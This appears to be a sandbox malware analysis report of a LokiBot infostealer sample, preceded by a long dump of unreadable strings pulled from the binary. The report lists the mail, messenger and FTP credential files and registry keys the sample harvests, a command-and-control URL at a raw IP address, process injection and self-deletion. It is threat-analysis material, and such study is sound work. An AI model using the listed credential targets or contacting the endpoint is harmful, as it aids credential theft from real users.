/Ma/Lg/L`/MA/Ma/MA/M@/MA/MC/Ma/Ma/Mc/MB/MF/La/Lf/L`/Mc/M`/MF/Lb/Lc/L`/MC/MB/MB/MA/Lb/Lf/M@/MF/MA/Mc/Mg/Mf/Ma/MC/Mg/Ma/M`/Mc
.JkJ^
w36Uc
y!^Le
F H 322;&
; 2
H):222
aV7v
oZ24=
WpdzJYF4qKrmwGbj1UvKXwiTJBh
dz{{
22F6
%NV22
@]dE
/Mf/MB/La/MC/Ma/M@/M@/Mc/Lf/Lf/MF/MF/Lg/MF/MC/MF/Lb/Mf/Mf/MC/Ma/L`/M`/Ma/Lc/L`/M`/Mf/L`/L`/Mc/M`/MC/MA/Ma/MF/Lb/Mg/MB/La/Mc
/Mg/L`/La/L`/Mc/M@/MA/L`/MC/M@/Mg/La/Ma/MB/Lg/Ma/M`/MF/Mf/M`/Lg/L`/MB/Mc/L`/Lb/Lc/MC/M`/MF/Mc/MB/Lc/Lg/La/MA/Lf/Lc/La/Mg/Mc
Ha422@
%}>22F
rvQ$
\g8Rm
'|:[
HA022
/MF/Lb/MB/Lb/Mg/Mc/MF/Lg/MB/Ma/Mf/Mf/MB/MC/MC/MF/Mg/MF/Lg/Ma/MF/M`/Mc/MC/La/Mc/MF/Mf/MC/L`/MA/MC/La/M@/MB/MC/M@/Mf/MF/MA/Mc
Dxa322
t O
MC/La/Mc/MA/Lg/Mg/MC/MA/Mf/L`/Lg/Ma/L`/Lg/Mf/Mg/M@/MB/Lc/Mc
iFa^K
HM022
g/MB/Mg/MC/MB/Mf/MC/Lb/MA/Mf/MC/Ma/Lb/La/Mf/Lc/M@/M@/Lb/Mg/M@/MB/MA/La/Mf/MA/MC/Lc/MF/Mc/Mf/L`/Mf/Lb/Lb/MF/Ma/Mc
#Cy p
N_rE=U
722FK
9Qt#
I5-g&
%6 22
%S9sW
HQ322
HA:22
\@6l
HE322
H9322%>
#GUID
% W22
4/]7
qJ-v
:22]I
xr&x
S&Rn
/MC/L`/Ma/Ma/Mg/Mc/Lb/Lg/Ma/MA/Lf/L`/Mg/Mc/M`/MB/Lb/Lb/Ma/Mg/Mg/La/L`/M`/MF/Lf/Ma/La/Lg/Mf/MC/Lf/M@/Mc/M@/Mg/Mc/MA/Mg/Lb/Mc
%gQ22
6S*d&
^T2cK
HM:22
/La/MC/Mf/M y
722F5
o oS
%C322N
T22N
%Z_22
k5G1
/Lc/Mf/La/Mc/Mc/Mg/Mf/Mg/Lc/Mg/Mg/Mg/Mg/Lb/L`/Mg/Mf/MC/M`/Mf/L`/Lf/M@/Ma/M`/Lb/M`/MA/Lg/Lb/Ma/Ma/MB/Mg/Mg/M`/Mf/Lg/Ma/M`/Mc
NOfw
U 1^
BkyS339BX9x4j877Md1VL
@p-622
Dx[322
.;iT
DPa:22 H}:22
xx%4
HY322
122>h
m;Id
/Lf/M@/Mg/MA/Lg/Mg/MF/Ma/Ma/L`/Lc/Lf/Mf/L`/M`/Lg/Ma/L`/Lf/Lf/MB/MC/MA/MF/Lc/Lf/MF/Lc/L`/Ma/M`/Lb/Ma/La/Mc/La/M@/Lf/Mg/Lb/Mc
/MA/Lc/Lc/M@/Lb/MF/M@/Lb/Lc/MF/Lc/MF/Mg/MA/Mc/La/MF/Ma/MC/L`/Lb/Lc/La/MC/La/L`/MC/MF/MC/Mf/Ma/Mg/La/Lc/Lf/L`/Mg/Lc/M@/MB/Mc
H%122
F H)82252
/Ma/Lg/L`/L`/MC/M@/MA/M@/Lg/Lc/La/MB/Lf/La/MF/Ma/MF/M`/Lf/Lb/Mf/MC/Mc/Lg/MC/Lc/Lb/L`/Mg/MF/MA/MA/MF/MC/Lc/La/MA/M@/MF/Mg/Mc
fV6_
%7722G
/MC/Mf/M`/MB/MF/MC/Mf/M`/La/Lc/Mc/Lc/Mc/MA/Lg/Mc/Lc/MA/Lg/La/La/MC/MB/Lc/M@/Ma/Lb/MF/La/M@/Lb/MC/Lg/L`/L`/Lf/MC/Lg/MB/Mg/Mc
/Lf/M@/M@/Ma/MA/MA/Lb/L`/Lb/MA/MC/Ma/MA/L`/MB/MF/MA/Ma/MA/Lf/Lf/M@/M@/MC/MC/Lg/Mc/Mc/Lb/Mg/M@/MA/Ma/Lg/MB/M`/Ma/Lc/Lf/Mg/Mc
yi6q
/La/MF/Mg/Ma/Lg/MC/Mg/MB/MF/Lc/Mc/L`/Ma/Ma/MF/MB/MF/MB/Lf/Mc/Mg/M@/Lb/Mg/Ma/L`/Mf/MB/Mg/MC/Lb
$GoPdttUlkoytY4wnsQF2oWD3muUFpkbOjafX
B<wy>G?#
F Hq:22
2%_)22F
/La/Ma/Lg/L`/Lg/Ma/Ma/Lf/MF/MA/M@/MF/MC/Lb/M`/MC/M@/L`/MA/Mg/Mg/Mg/Mg/MB/MC/MA/Mf/MB/M`/Lc/Lg/Mg/Ma/MC/MC/M`/Mg/Lf/Mf/L`/Mc
H-322S9
X\\tcR
/Mg/Lf/Ma/Lc/Mg/MB/M`/Mg/Mf/Lg/Lb/L`/L`/MF/Mc/Lg/MB/MA/M@/Mg/Mf/Lb/Lc/M`/MB/MF/Ma/L`/Mc/Mc/Lc/Ma/MA/Mg/MF/Mc/Mc/MC/Lf/Mg/Mc
)+)jR
T q]O
Thread
~dJ|
232F
H; G
8>e!g
722D
N{JP|,D
CbufO
%_=22
mzZ`m5[
pw3tY
%S:22@
eqjj
/MC/MF/Ma/M`/Mf/Mg/MA/Lb/M`/Ma/M`/MC/Lf/Lb/MB/Lg/Mf/MA/La/Mg/MC/Mg/La/MF/L`/MA/L`/M@/M`/Mg/La/Lg/Lc/MC/Mc/Lg/M`/M@/Mg/Mg/Mc
/MC/Lc/Lc/Mg/Mf/La/Lf/Ma/Mf/La/La/M@/MC/Ma/Ma/L`/Mg/M@/MA/M@/Lc/Ma/Lf/MA/Lf/M`/M`/Mf/Mc/M@/M@/MC/Mg/La/Lb/Mf/Ma/Lc/Mc/L`/Mc
>?E=A>
f.D6
Pl4Aa
fVh813oAklLIgPJsNPxO60f9
322FH-322N
DXs322
/Ma/Lc/Mc/L`/Mg/Mf/Lf/Mg/Lb/MB/MB/Lb/M@/Lc/Mg/Mg/MF/MF/Mc/Ma/MC/MF/Mf/Mf/Mg/Lb/MA/Lb/Mg/Lc/Mc/M`/Lc/Ma/MB/La/MA/M`/MC/Lb/Mc
He322
?}YZ
2 M H
MSlpj=u
%8\22
F= H98222
TWaN
b */&
/Mg/MA/Lg/M`/M@/L`/Mf/MC/MC/Mg/Mg/Lb/M`/L`/MA/MC/Mc/La/Lf/M@/Lg/L`/M@/Mf/M`/M`/Ma/Lb/Mc/L`/Lf/Lf/Lg/La/Mg/MF/Mg/L`/La/M@/Mc
1arcFefkZYo6lPzLpohNZJ1
H 322~>
"Gxi
%-Lg
ZfosMLzuRw9T5P2VViORol
*2`*0
H2 H
$d<<q
}Vh3
%J}j
@ HI822X
mvPTNt8hlity6RLCbJydQoPCH4Rnq
H1022]
He522
hb8v971JVMNr7mB49v2i7EmF
m\EP
%3022
Z)=l
%4 ~
"p"&
$c5[;
Z1.=jYx/
`[Zjp.!
2 Bje Q
}cjU
?F &
H91222
7>*;
% K222
mscoree.dll
/Ma/La/MB/Ma/Lc/Lg/Lf/MB/Lg/Lf/La/Ma/Ma/Mc/Mg/Mg/Mg/La/L`/MB/MC/MA/Mc/Lf/Lf/La/Mc/MF/Mf/MF/Lg/Mg/MC/Mf/Mc/MB/Mg/MA/La/M`/Mc
d,
322@pI322DXM322s
%.d22@
@p-322>h@p
7]]i]]]
DPs022s
hhhF
faibZ5aTu51C7l17a8RSLg1RcEVH
#pLZtoayuK1ZMyAFrSdaMHI3jNGh1sPzZyLk
/Ma/Lg/L`/M@/Mc/MC/Lb/La/MB/Lf/MB/La/MC/Lf/L`/Ma/Mc/MA/Lf/L`/M@/Lc/Mg/Lb/La/M`/MC/Ma/M@/Ma/MF/M@/MC/Mf/Lc/L`/MC/Lb/L`/Ma/Mc
/MF/Mf/MF/L`/Mf/MB/L`/MB/Lc/M`/L`/Lb/La/MF/La/Mg/Lf/M`/MA/MB/M`/MF/MC/Ma/Mf/L`/Lb/Lf/Lb/Ma/Mc/L`/MB/Mg/MC/MF/Ma/MF/Lc/MA/Mc
cy>
DH+322
System.Collections.Generic
H.CZx
b~y@
%p(22@
H9122
voQcaE2HUXkUPnxNF7K31bTzq1wdqq
H-122
H=322@
/Lg/La/MC/M`/Mg/M`/La/Lb/La/M`/MF/MC/Mf/MA/Mg/MA/M@/MA/M@/Lc/Lc/Ma/Lc/MB/M@/MF/MA/L`/M@/Lb/MA/Lf/M@/Lg/MC/Lf/M@/Lc/La/Lb/Mc
%|]22
"DH|
%Kw22N
System.Windows.Forms
F!L!M
@H/722
KiY5VzH008ndiXauiRrFkBd0U5VSqDQF
/Mf/Mf/MB/Mf/MA/La/MC/Lb/L`/Lc/MA/La/Ma/M@/Lf/La/La/M@/Lg/MB/MC/Lg/MF/L`/MA/Mc/Lb/MA/Lf/Lf/Lf/MC/MB/Lf/Lf/Mg/L`/Mc/MA/Mg/Mc
%PF22F=D
1v.A
x'ds
/Lb/MA/M@/Lb/L`/Mf/Mg/Lc/Lg/MA/MF/L`/Mc/M@/L`/MC/MB/M@/Lb/M@/Lc/MB/Mf/M@/M`/Lg/M@/L`/Mg/MC/Lg/Mg/Lf/MF/Mc/MF/MB/MA/Mc
%=$32
Hq322DI
'%2622N
\c>U
F=N32
yX`4
022
Dp 322
RQaX
@HD322i
DHw322
~)t {
DHc322
l;$
@pS022>h@p
&`+!
6U 3
/La/Mc/MB/Lc/MB/Lc
F!L!A
%y122
%=|22F=N
Sleep
%Gv22F5N
%o922
uJ7h8kvEKpiDj8atwUiuQCKlYwoV
F5N3
HQ022
/Mf/Lf/Lb/Lf/MC/M@/MB/MC/Lg/M`/M`/MF/MB/MB/MA/MF/Lg/M`/Lf/Lg/M@/M`/MA/Lf/Lc/Mg/M@/Ma/La/MC/MF/MC/Lb/Lc/Lg/Mc/L`/Lb/MC/Mc/Mc
%M122
gp)e
j:$zM
9+ G
L H
822 '
F5N*
F!L!y
=hhhhF
%Z722
.WM
HU;22
R22F=N
2XGDFqH3oAZao5ooIlU7DlAbV
}4Fg+a8
&Xonpd8He27cpDE9A1UzMpbcm80R5CSHJpDv3c2
F5N
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:42:07 | 208 |
16 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN LokiBot User-Agent (Charon/Inferno)
- signature: ET TROJAN LokiBot Checkin
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M2
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Collects information to fingerprint the system
Severity: High
Confidence: High
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
- file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Deletes its original binary from disk
Severity: High
Confidence: Very High
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: 212121212112.exe(2276) -> 212121212112.exe(2560)
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: C:\Windows\system32\sc.exe start w32time task_started
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 6.94, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0003e600, virtual_size: 0x0003e414
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://89.187.86.7/~blackdia/new/mhoney/fre.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- http_version_old: HTTP traffic uses version 1.0
- ip_hostname: HTTP connection was made to an IP address rather than domain name
- suspicious_request: http://89.187.86.7/~blackdia/new/mhoney/fre.php
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionAndSpinCount
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: msvcrt.dll/_set_error_mode
- DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
- DynamicLoader: msvcrt.dll/_get_terminate
- DynamicLoader: KERNEL32.dll/FindActCtxSectionStringW
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: mscorwks.dll/SetLoadedByMscoree
- DynamicLoader: mscorwks.dll/_CorExeMain
- DynamicLoader: mscorwks.dll/GetCLRFunction
- DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
- DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
- DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
- DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
- DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
- DynamicLoader: ADVAPI32.dll/TraceEvent
- DynamicLoader: MSCOREE.DLL/IEE
- DynamicLoader: mscoreei.dll/IEE_RetAddr
- DynamicLoader: mscoreei.dll/IEE
- DynamicLoader: mscorwks.dll/IEE
- DynamicLoader: MSCOREE.DLL/GetStartupFlags
- DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
- DynamicLoader: mscoreei.dll/GetStartupFlags
- DynamicLoader: MSCOREE.DLL/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
- DynamicLoader: mscoreei.dll/GetCORVersion
- DynamicLoader: MSCOREE.DLL/GetCORSystemDirectory
- DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: ntdll.dll/RtlUnwind
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/AddVectoredContinueHandler
- DynamicLoader: KERNEL32.dll/RemoveVectoredContinueHandler
- DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/GetWriteWatch
- DynamicLoader: KERNEL32.dll/ResetWriteWatch
- DynamicLoader: KERNEL32.dll/CreateMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/CryptCreateHash
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptHashData
- DynamicLoader: ADVAPI32.dll/CryptGetHashParam
- DynamicLoader: ADVAPI32.dll/CryptImportKey
- DynamicLoader: ADVAPI32.dll/CryptExportKey
- DynamicLoader: ADVAPI32.dll/CryptGenKey
- DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
- DynamicLoader: ADVAPI32.dll/CryptSignHashA
